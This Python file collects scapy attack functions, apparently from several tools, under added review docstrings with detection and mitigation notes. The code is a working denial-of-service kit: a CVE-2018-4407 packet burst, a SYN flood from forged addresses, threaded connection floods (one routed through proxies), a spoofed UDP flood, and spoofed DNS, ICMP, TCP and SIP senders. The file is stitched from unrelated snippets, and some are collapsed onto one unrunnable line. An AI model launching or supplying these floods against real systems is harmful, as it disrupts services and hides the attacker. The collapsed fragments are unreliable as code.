def cmd_tcpip(ip_src, ip_dst, TOS, ttl, id, reserved, seq_num, window, urg_ptr, flags, payload, src_port):
    """Craft a single TCP segment to port 80 from caller-supplied header fields and send it.

    ``TOS``, ``reserved`` and ``urg_ptr`` are strings of binary digits and are
    parsed with ``int(..., 2)``; every other value is assigned to the matching
    scapy field as given.  ``ip_src`` is written into the IP header verbatim,
    so the packet's source address is whatever the caller passes.  When
    ``payload`` is falsy the segment is sent without a body.

    Nothing is returned; the parsed TOS value, the reserved bits and a
    literal "1" are printed as progress output before the packet is sent.
    """
    # --- IP header -------------------------------------------------------
    ip_hdr = IP()
    ip_hdr.src = ip_src
    ip_hdr.dst = ip_dst
    tos_value = int(TOS, 2)
    print(tos_value)
    ip_hdr.tos = tos_value
    ip_hdr.ttl = ttl
    ip_hdr.ihl = 5  # header length in 32-bit words, i.e. a header without options
    ip_hdr.id = id

    # --- TCP header ------------------------------------------------------
    tcp_hdr = TCP()
    tcp_hdr.dport = 80
    tcp_hdr.sport = src_port
    reserved_bits = int(reserved, 2)
    print(bin(reserved_bits))
    tcp_hdr.reserved = reserved_bits
    tcp_hdr.flags = flags
    tcp_hdr.window = window
    tcp_hdr.urgptr = int(urg_ptr, 2)
    tcp_hdr.seq = seq_num
    print("1")

    # Stack the layers, adding the payload only when one was supplied.
    segment = ip_hdr / tcp_hdr
    if payload:
        segment = segment / payload
    send(segment)
def run(self):
    """Send the packet sequence that the banner labels a CVE-2018-4407 check.

    For each ``i`` from 8 through 19, one TCP packet is sent to port 2323 on
    ``self.rhost``.  Its IP header carries an ``IPOption`` built from ``i``
    ``"A"`` characters, and its TCP header carries two options of kind 19
    with 18-character values.  Nothing is read back from the network, so
    "Check Over" only means the sends completed; the method never learns
    whether the target was affected.

    Defensive notes:
      * Detection: a short burst of TCP packets from one source that
        combine IP options with a repeated TCP option kind 19 on port 2323
        is presumably rare in ordinary traffic and makes a usable IDS
        signature -- confirm against local baselines.
      * Mitigation: apply the vendor fix for CVE-2018-4407 on affected
        hosts, and drop packets carrying IP options at the perimeter where
        they are not needed.
    """
    RHOST = self.rhost
    try:
        print("[*] !!!!!!Dangerous operation!!!!!!")
        print("[*] Trying CVE-2018-4407 ICMP DOS " + RHOST)
        # Twelve packets; only the IP option length changes between them.
        for i in range(8, 20):
            send(
                IP(dst=RHOST, options=[IPOption("A" * i)]) / TCP(dport=2323, options=[(19, "1" * 18), (19, "2" * 18)]))
        print("[*] Check Over!! ")
    except Exception as e:
        # NOTE(review): every failure is reported as a privilege problem and
        # the caught exception `e` is never shown, so causes such as a
        # non-string rhost or a routing error are hidden from the operator.
        print("[*] usage: Requires root privileges run")
def cmd_ping(ip_dst, ip_src, seq, icmp_id):
    """Send one ICMP echo-request with a fixed payload and print "Ping Sent".

    ``ip_src`` is placed in the IP header as given, so the source address is
    caller-controlled.  ``seq`` and ``icmp_id`` fill the ICMP sequence and
    identifier fields.  No reply is awaited.

    Side effect: ``conf.verb`` is set to ``False`` and is not restored, so
    scapy stays quiet for the rest of the process.
    """
    conf.verb = False

    ip_hdr = IP()
    for field, value in (
        ("src", ip_src),
        ("dst", ip_dst),
        ("tos", 0),
        ("id", 1),
        ("flags", 0),
        ("frag", 0),
        ("ttl", 128),
        ("proto", 1),  # 1 = ICMP
    ):
        setattr(ip_hdr, field, value)

    echo = ICMP()
    for field, value in (
        ("type", 8),  # 8 = echo-request
        ("code", 0),
        ("id", icmp_id),
        ("seq", seq),
    ):
        setattr(echo, field, value)

    body = b"abcdefghijklmn opqrstuvwabcdefg hi"
    send(ip_hdr / echo / body)
    print("Ping Sent")
def syn_flood(dst_ip, dst_port):
    """Send one TCP SYN per source port 1024..65534 to ``dst_ip:dst_port``.

    Each packet's source address is drawn at random from a hard-coded list
    of four addresses, so the SYN-ACKs from the target go to hosts that never
    asked for them and the handshakes are never completed.  The function
    returns after 64511 packets; ``dst_port`` may be a string because it is
    passed through ``int()``.

    Defensive notes:
      * Detection: the traffic is distinctive -- SYNs from only four source
        addresses whose source ports increase strictly by one, with no
        follow-up ACK.  A rising half-open connection count on the listener
        is the host-side symptom.
      * Mitigation: SYN cookies and a bounded SYN backlog on the target,
        per-source SYN rate limits upstream, and source-address validation
        (BCP 38 ingress filtering) on the sending network, which stops
        forged source addresses from leaving it.
    """
    # First, forge 4 arbitrary source IP addresses
    ips = ['11.1.1.2', '22.1.1.102', '33.1.1.2', '125.130.5.199']
    # Choose an arbitrary port number
    # sums = 0
    print('\nattacking....')
    # range() excludes its upper bound, so source port 65535 is never used.
    for src_port in range(1024, 65535):
        # while 1:
        # src_port = randrange(1024, 65535)
        index = randrange(4)  # random index into the four-entry list above
        ip_layer = IP(src=ips[index], dst=dst_ip)
        tcp_layer = TCP(sport=src_port, dport=int(dst_port), flags='S')
        send(ip_layer / tcp_layer, verbose=0)  # verbose: whether to print the send result
def dns_attack(dst_ip, src_ip): a = IP(dst=dst_ip, src=src_ip) # 192.168.1.200 为伪造的源ip b = UDP(dport=53) c = DNS(id=1, qr=0, opcode=0, tc=0, rd=1, qdcount=1, ancount=0, nscount=0, arcount=0) c.qd = DNSQR(qname='www.qq.com', qtype=1, qclass=1) p = a / b / c send(p)
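def sip_message(ip_dst, ip_src, CallID, mf, contact):
    """Send one SIP INVITE over UDP from port 3001 to ``ip_dst:5060``.

    Args:
        ip_dst: Destination address; also used in the request URI and the
            ``To`` header.
        ip_src: Address written into the IP header as the source.
        CallID: Value of the ``Call-ID`` header.
        mf: Value of the ``Max-Forwards`` header.
        contact: User part of the ``Contact`` URI.

    The header values are substituted in a single ``str.format`` call.  The
    previous version concatenated them into the template and then formatted
    the whole string, so a ``{`` or ``}`` inside ``CallID``, ``mf`` or
    ``contact`` either raised or was expanded as a placeholder.  Output for
    brace-free values is unchanged.

    NOTE(review): the values are inserted verbatim.  A CR/LF inside any of
    them adds extra header lines to the request; callers that take these
    values from outside should reject control characters first.
    """
    sourcePort = 3001
    destinationIp = ip_dst
    sourceIp = ip_src
    ip = IP(src=sourceIp, dst=destinationIp)
    # NOTE(review): "[email protected]" in the From header looks like an
    # e-mail-obfuscation artifact from wherever this snippet was copied;
    # left untouched because the intended address is not recoverable here.
    myPayload = (
        'INVITE sip:{0}:5060;transport=tcp SIP/2.0\r\n'
        'Via: SIP/2.0/UDP 192.168.44.32:5060;branch=1234\r\n'
        'From: \"somedevice\"<sip:[email protected]:5060>;tag=5678\r\n'
        'To: <sip:{0}:5060>\r\n'
        'Call-ID: {1} \r\n'
        'CSeq: 1 INVITE\r\n'
        'Max-Forwards: {2}\r\n'
        'Contact: <sip:{3}@pc33.atlanta.com>\r\n'
        'Content-Length: 0\r\n\r\n').format(destinationIp, CallID, mf, contact)
    udp = UDP(dport=5060, sport=sourcePort)
    send(ip / udp / myPayload)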
def run(self):
    """Worker loop: repeatedly open a TCP connection to the target and send a fixed blob.

    Reads the module-level names ``url2``, ``port``, ``multiple`` and ``go``,
    none of which are defined in this block.  The blob ``p`` is the byte
    serialization of a scapy IP/UDP packet around 1024 random bytes; it is
    written to a ``SOCK_STREAM`` socket, so on the wire it is ordinary TCP
    payload, not a raw UDP datagram.  The loop has no exit condition.

    Defensive notes:
      * Detection: because a real TCP connection is made, the source address
        is the sender's own.  Each connection carries a 1052-byte payload
        (20-byte IP header + 8-byte UDP header + 1024 bytes) whose first
        bytes are a serialized IPv4 header -- a stable content signature.
      * Mitigation: per-source connection-rate and concurrent-connection
        limits at the load balancer or firewall.
    """
    data = random._urandom(1024)  # private alias inside `random`; presumably os.urandom -- confirm
    p = bytes(IP(dst=str(url2))/UDP(dport=int(port))/data)
    go.wait()  # presumably a shared threading.Event acting as a start gate -- confirm
    while True:
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((str(url2),int(port)))
            s.send(p)
            print ("Request Sent! @", self.counter)
            try:
                # Further sends on the same connection; any exception closes the socket.
                for y in range(multiple):
                    s.send(str.encode(p))
            except:
                s.close()
        except:
            # NOTE(review): bare except also swallows KeyboardInterrupt and
            # SystemExit, and `s` is unbound here if socket() itself failed
            # on the first iteration.
            s.close()
def run(self):
    """Worker loop: same fixed-blob sender, but connecting through an HTTP proxy.

    Reads the module-level names ``url2``, ``port``, ``multiple``, ``go``,
    ``x`` and ``proxies``, none of which are defined in this block.  One
    proxy is chosen before the loop starts: entry ``x`` of ``proxies`` when
    that index exists, otherwise a random entry.  Entries are expected in
    ``host:port`` form.  The blob ``p`` is the byte serialization of a scapy
    IP/UDP packet around 1024 random bytes and is sent as stream payload
    through the proxied socket.  The loop has no exit condition.

    Defensive notes:
      * Detection: the target sees the proxy's address, not the sender's, so
        per-source counters spread across the proxy list.  The payload is
        still a constant-size blob that begins with a serialized IPv4
        header, which gives a content signature independent of source
        address.
      * Mitigation: rate limits keyed on more than source address, and
        reputation lists of open proxies at the edge.
    """
    data = random._urandom(1024)  # private alias inside `random`; presumably os.urandom -- confirm
    p = bytes(IP(dst=str(url2))/UDP(dport=int(port))/data)
    current = x
    if current < len(proxies):
        proxy = proxies[current].strip().split(':')
    else:
        proxy = random.choice(proxies).strip().split(":")
    go.wait()  # presumably a shared threading.Event acting as a start gate -- confirm
    while True:
        try:
            # Sets the process-wide default proxy on every iteration.
            # NOTE(review): `socks` looks like SocksiPy/PySocks, where the
            # fourth positional argument is rdns -- confirm.
            socks.setdefaultproxy(socks.PROXY_TYPE_HTTP, str(proxy[0]), int(proxy[1]), True)
            s = socks.socksocket()
            s.connect((str(url2),int(port)))
            s.send(p)
            print ("Request sent from " + str(proxy[0]+":"+proxy[1]) + " @", self.counter)
            try:
                # Further sends on the same connection; any exception closes the socket.
                for y in range(multiple):
                    s.send(str.encode(p))
            except:
                s.close()
        except:
            # NOTE(review): bare except also swallows KeyboardInterrupt and
            # SystemExit, and `s` is unbound here if the first iteration
            # failed before socksocket() returned.
            s.close()
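def main(argv):
    """Parse ``-s/--start`` and ``-e/--end`` and emit 1000 UDP frames on the eth0 interface.

    Each frame is ``Ether / IP / UDP`` with destination port 80 and source
    port 2.  The destination address comes from ``gendest(start, end)`` and
    the source address from ``sourceIPgen()``; both helpers are defined
    elsewhere in the file.

    Args:
        argv: Printed for diagnostics only; the options are read from
            ``sys.argv[1:]``, as in the original.

    Changes from the original:
      * ``start`` and ``end`` are initialised to ``None``.  Previously they
        were compared with ``''`` after the option loop, which raised
        ``UnboundLocalError`` when an option was omitted and could never be
        true when it was given, since the values are ints by then.
      * The long forms ``--start`` / ``--end`` were accepted by ``getopt``
        but ignored by the loop; they are now handled.
      * A non-numeric option value exits with status 2 instead of a
        traceback.

    Exits with status 2 on any usage error.
    """
    print(argv)
    try:
        opts, args = getopt.getopt(sys.argv[1:], 's:e:', ['start=', 'end='])
    except getopt.GetoptError:
        sys.exit(2)

    start = None
    end = None
    try:
        for opt, arg in opts:
            if opt in ('-s', '--start'):
                start = int(arg)
            elif opt in ('-e', '--end'):
                end = int(arg)
    except ValueError:
        sys.exit(2)
    if start is None or end is None:
        sys.exit(2)

    # Fixed command string with no caller input, so the shell is not an
    # injection risk here.
    # NOTE(review): this prints the first field of every ifconfig line that
    # mentions eth0; on systems whose ifconfig prints "eth0:" or several
    # matching lines the result is not a usable interface name -- confirm.
    interface = popen('ifconfig | awk \'/eth0/ {print $1}\'').read()

    for i in range(1000):
        packets = Ether() / IP(dst=gendest(start, end), src=sourceIPgen()) / UDP(dport=80, sport=2)
        print(repr(packets))
        sendp(packets, iface=interface.rstrip(), inter=0.1)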
# CVE-2018-4407 ICMP DOS # https://lgtm.com/blog/apple_xnu_icmp_error_CVE-2018-4407 import sys from telnetlib import IP from scapy.all import * # try: # from scapy.all import * # except Exception as e: # print ("[*] You need install scapy first:\n[*] sudo pip install scapy ") from scapy.layers.inet import IPOption, TCP if __name__ == '__main__': try: check_ip = sys.argv[1] print("[*] !!!!!!Dangerous operation!!!!!!") print("[*] Trying CVE-2018-4407 ICMP DOS " + check_ip) for i in range(8, 20): send(IP(dst=check_ip, options=[IPOption("A"*i)])/TCP(dport=2323, options=[(19, "1"*18), (19, "2"*18)])) print("[*] Check Over!! ") except Exception as e: print("[*] usage: sudo python check_icmp_dos.py 127.0.0.1")